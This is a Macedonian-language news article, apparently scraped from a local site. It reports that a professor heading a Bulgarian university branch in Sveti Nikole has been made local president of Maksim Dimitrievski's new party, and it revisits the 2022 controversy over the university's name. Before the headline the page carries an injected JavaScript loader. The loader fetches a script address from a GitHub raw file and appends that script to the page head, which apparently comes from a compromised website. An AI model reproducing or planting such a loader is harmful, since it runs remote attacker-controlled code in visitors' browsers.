;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Раководител на бугарски приватен универзитет назначен за Претседател на движењето на Максим во Свети Николе - Антропол
АктуелноЛокално

Раководител на бугарски приватен универзитет назначен за Претседател на движењето на Максим во Свети Николе

  • Раководител на бугарски приватен универзитет каде нема да се предава на македонски јазик назначен за Претседател на партијата во основање на Максим Димитриевски во Свети Николе.

Борче Серафимовски кој во 2022 година беше поставен за раководител на бугарскиот универзитет кој се обиде да го презеде името на УКИМ, Великотрновскиот универзитет „Св.Св. Кирил и Методиј“, тогаш по одлука на централниот регистар и Владата на СДСМ, е назначен за претседател на партијата во оснаовање на Максим Димитриевски – Движење ЗНАМ – За наша Македонија.

Потсетуваме, Максим Димитриевски, промоторот на кампањата за промена на уставното име на Република Македонија, кој како пратеник лично глсаше за промена на државното име, а денес собира политички поени на патриотска карта, претходно вработуваше службеници во кумановската администрација кои се Македонци, но се изјаснуваа како Албанци.

За сновањето на бугарскиот универзитет во Свети Николе беше сооштено на јавноста на 14 септември 2022 година, а него го одобриле прво Владата на СДСМ и ДУИ, потоа Претседателот на Одборот за акредитација на високото образование и на крај Министерството за образование и наука во Регистарот на високообразовни установи.

Тогаш за раководител е поставен Борче Серафимовски, професор од Свети Николе, кој дотогаш беше заменик претседател на Управниот одбор на Меѓународниот славјански универзитет, што е приватен универзитет во сопственост на поранешен градоначалник во Свети Николе од редовите на СДСМ.

„Со оваа одлука на странската високообразовна установа Великотрновскиот универзитет „Св. св. Кирил и Методиј“, со седиште на ул. „Теодосиј Терновски 2“ 5003 Велико Трново, Република Бугарија, акредитирана за вршење на високообразовна дејност од страна на Националната агенција за оценување и акредитација на Република Бугарија, се дава одобрение за вршење на високообразовна дејност на територијата на Република Македонија“ гласеше одлуката што ја објави Владата во мај 2022 година по завршената седница.

Тогаш медиумите реагираа дека Владата на СДСМ и ДУИ во својата постапка го загрозува Законот за авторски права и индустриска сопственост, дозволувајќи (странски) универзитет со релиси исто име паралелно да работи на наша територија.

На прашањето зошто дале одобрение на странски универзитет со исто име како нашиот најреномиран и најстар универзитет „Свети Кирил и Методиј“, одговорија дека сè е по закон и прописи, и дека називот: Великотрновски универзитет „Свети Свети Кирил и Методиј“ од Велико Трново се разликува од нашиот Универзитет „Свети Кирил и Методиј“ од Скопје.

Бугарската влада нешто претходно истата година му одобрила на Универзитетот „Св. Кирил и Методиј” од Велико Трново да отвори катедри во Свети Николе. Според тогашните најави од Софија, на катедрите ќе се подготвуваат студенти за магистратура од областите на Филологијата, Науки за земјата и Информатиката и компјутерски науки. Наставата ќе се изведува на англиски јазик, а дипломата ќе гласи дека е издадена од Универзитетот во Велико Трново.